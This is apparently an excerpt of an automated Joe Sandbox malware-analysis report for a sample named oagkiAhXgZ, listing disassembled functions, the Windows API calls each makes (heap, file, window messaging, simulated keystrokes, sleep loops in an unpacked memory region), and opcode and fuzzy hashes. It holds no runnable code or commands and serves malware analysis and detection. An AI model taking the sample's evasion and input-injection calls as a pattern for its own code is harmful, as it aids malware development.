                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 314386986-0
                                                                                                    • Opcode ID: 0a556b694acb69d6588d53ab24fdc341e3f31c7a2bdf25161661ea63b318bdc5
                                                                                                    • Instruction ID: 8f6ecbe94b67b72d65082225d5aafbfb1933742cbaac8065a5963bf22cd52994
                                                                                                    • Opcode Fuzzy Hash: 0a556b694acb69d6588d53ab24fdc341e3f31c7a2bdf25161661ea63b318bdc5
                                                                                                    • Instruction Fuzzy Hash: 2DF06DB20057008FE7249F10D941B52B7F8EB04725F20892FE29B87B91CBB4B944CB94
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
                                                                                                    • Instruction ID: d95c1bf2f30061fdba0e9581b43327a6ab11306040d0b2b272a16afe34cf05cd
                                                                                                    • Opcode Fuzzy Hash: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
                                                                                                    • Instruction Fuzzy Hash: A2E0E53310232466DE212B779D00F9E3A5AAB427B0F1A0026BC16A7680CB50DD01A2E6
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4F6D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: b21d1f4d7f972cd7d703c084018872541c78c84dabbfdc98caa93117885680c7
                                                                                                    • Instruction ID: 0af576f77ab49cb0ca65c8fad3febba864abec81fe9a77e4b9dab050167ed0b0
                                                                                                    • Opcode Fuzzy Hash: b21d1f4d7f972cd7d703c084018872541c78c84dabbfdc98caa93117885680c7
                                                                                                    • Instruction Fuzzy Hash: 58F0A971105742CFDB348F60D49082ABBF0AF4A729320997EF1EA83660CBB19844EF00
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 541455249-0
                                                                                                    • Opcode ID: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
                                                                                                    • Instruction ID: 0f12487396f2dd49e446c5e2068aa6609beacb7d7ccfa67f12f92c9c3834ed18
                                                                                                    • Opcode Fuzzy Hash: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
                                                                                                    • Instruction Fuzzy Hash: ACE0CD726001345BC711A6989D05FDE77DDDFC8790F040075FD09E7248DA70AD808690
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                    • Instruction ID: 01e20f1c79c26f656a4e70b6642a1e9b55d44abafbcce845997ef510fe97fe22
                                                                                                    • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                    • Instruction Fuzzy Hash: 25E04FB1609B005FDF399B28A951BF677E8DF49300F00086EF69B82352E57268958A4D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908
                                                                                                      • Part of subcall function 00AAD730: GetInputState.USER32 ref: 00AAD807
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                                                                                                      • Part of subcall function 00AA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AA314E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                    • String ID:
                                                                                                    • API String ID: 3667716007-0
                                                                                                    • Opcode ID: 5b81433ea82f4931cea7892f28a777a274267a1d1674c3e63fbee0a7920df2a2
                                                                                                    • Instruction ID: 09f06f76b701bfd95d8532b54dfd5957c4a7cd491054203a4d25a23fde954852
                                                                                                    • Opcode Fuzzy Hash: 5b81433ea82f4931cea7892f28a777a274267a1d1674c3e63fbee0a7920df2a2
                                                                                                    • Instruction Fuzzy Hash: 9DE0262330020407CA08BB78A91257DA7498BD7351F00087EF147432E2CF2445454322
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 017C4363
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                    • Instruction ID: 0357af84f52a72586ae02f1fe071a96b15c334ed9ca64ec96107235b2fb11724
                                                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                    • Instruction Fuzzy Hash: CCE0C23090520CEBDB10CBBCCD14AADF3ACEB45720F004A9EE917E76C0E6308A40D794
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
                                                                                                    • Instruction ID: f845c86e8c1934b12e96035688e35e3916f09f8a69d03b5201df9c8c3128ef4b
                                                                                                    • Opcode Fuzzy Hash: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
                                                                                                    • Instruction Fuzzy Hash: 07D06C3204010DBBDF028F84DD06EDA3FAAFB48714F114000BE1866020C732E821AB90
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 017C4333
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                    • Instruction ID: 7eb4f64ee3b2d67842d89de1a1ded92068c154bb404b6604ad417f178aca760d
                                                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                    • Instruction Fuzzy Hash: C5D0A73090520CEBCB10CFB89D049DDB7A8D705321F00475CFD16D7280D5319A009750
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AA1CBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3098949447-0
                                                                                                    • Opcode ID: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
                                                                                                    • Instruction ID: 8720f885e7cd71d50e61e5c20b9157f88388f31130a3ee6091befd761ad90927
                                                                                                    • Opcode Fuzzy Hash: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
                                                                                                    • Instruction Fuzzy Hash: A4C09B36280304EFF31447D4BC4BF147754A358B00F154401F64D675E3CBA11450D764
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 017C5D69
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                    • Instruction ID: cf752d3b636df2cf07c6cbb63a7d333fbd29c487574f3368e6d9e3be057c2c70
                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                    • Instruction Fuzzy Hash: ACE0BF7494020DEFDB00DFA4D54D6DD7BB4EF04702F1006A5FD05D7681DB319E548A62
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 017C5D69
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                    • Instruction ID: 658303923f47a1c43ced5425151ace37752a2b04618838ee505915f3556ad79c
                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                    • Instruction Fuzzy Hash: 5AE0E67494020DDFDB00DFB4D54D69D7BB4EF04702F100265FD01D2281D6319D508A62
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B3961A
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3965B
                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B3969F
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B396C9
                                                                                                    • SendMessageW.USER32 ref: 00B396F2
                                                                                                    • GetKeyState.USER32(00000011), ref: 00B3978B
                                                                                                    • GetKeyState.USER32(00000009), ref: 00B39798
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B397AE
                                                                                                    • GetKeyState.USER32(00000010), ref: 00B397B8
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B397E9
                                                                                                    • SendMessageW.USER32 ref: 00B39810
                                                                                                    • SendMessageW.USER32(?,00001030,?,00B37E95), ref: 00B39918
                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B3992E
                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B39941
                                                                                                    • SetCapture.USER32(?), ref: 00B3994A
                                                                                                    • ClientToScreen.USER32(?,?), ref: 00B399AF
                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B399BC
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B399D6
                                                                                                    • ReleaseCapture.USER32 ref: 00B399E1
                                                                                                    • GetCursorPos.USER32(?), ref: 00B39A19
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B39A26
                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39A80
                                                                                                    • SendMessageW.USER32 ref: 00B39AAE
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39AEB
                                                                                                    • SendMessageW.USER32 ref: 00B39B1A
                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B39B3B
                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B39B4A
                                                                                                    • GetCursorPos.USER32(?), ref: 00B39B68
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B39B75
                                                                                                    • GetParent.USER32(?), ref: 00B39B93
                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39BFA
                                                                                                    • SendMessageW.USER32 ref: 00B39C2B
                                                                                                    • ClientToScreen.USER32(?,?), ref: 00B39C84
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B39CB4
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39CDE
                                                                                                    • SendMessageW.USER32 ref: 00B39D01
                                                                                                    • ClientToScreen.USER32(?,?), ref: 00B39D4E
                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B39D82
                                                                                                      • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B39E05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                    • API String ID: 3429851547-4164748364
                                                                                                    • Opcode ID: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                                                                                                    • Instruction ID: dbb477afe34253343f62d149f19634092739e28b03276c2ccfd383f34802b72d
                                                                                                    • Opcode Fuzzy Hash: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                                                                                                    • Instruction Fuzzy Hash: DE42BF35205200AFD724CF68CC85EAABBE5FF49310F204A99F699972A1DBB1EC51CF51
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B348F3
                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B34908
                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B34927
                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B3494B
                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B3495C
                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B3497B
                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B349AE
                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B349D4
                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B34A0F
                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A56
                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A7E
                                                                                                    • IsMenu.USER32(?), ref: 00B34A97
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34AF2
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34B20
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B34B94
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B34BE3
                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B34C82
                                                                                                    • wsprintfW.USER32 ref: 00B34CAE
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34CC9
                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34CF1
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B34D13
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34D33
                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34D5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                    • String ID: %d/%02d/%02d
                                                                                                    • API String ID: 4054740463-328681919
                                                                                                    • Opcode ID: 69fbd614af71dc13c2e92aba1b6fc8de077870b19fec130f1dd47c800d508f28
                                                                                                    • Instruction ID: b5613af745f495406dfbcc245f6b6b8cd2850b58f0ff1dca3ee4133fbdaf599e
                                                                                                    • Opcode Fuzzy Hash: 69fbd614af71dc13c2e92aba1b6fc8de077870b19fec130f1dd47c800d508f28
                                                                                                    • Instruction Fuzzy Hash: F912D271500214AFEB258F68CC4AFAE7BF8EF45710F2441A9F519EB2E1DB74A941CB50
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ABF998
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AFF474
                                                                                                    • IsIconic.USER32(00000000), ref: 00AFF47D
                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00AFF48A
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00AFF494
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4AA
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00AFF4B1
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4BD
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4D6
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00AFF4DE
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00AFF4E1
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF4F6
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00AFF501
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF50B
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00AFF510
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF519
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00AFF51E
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF528
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00AFF52D
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00AFF530
                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00AFF557
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 4125248594-2988720461
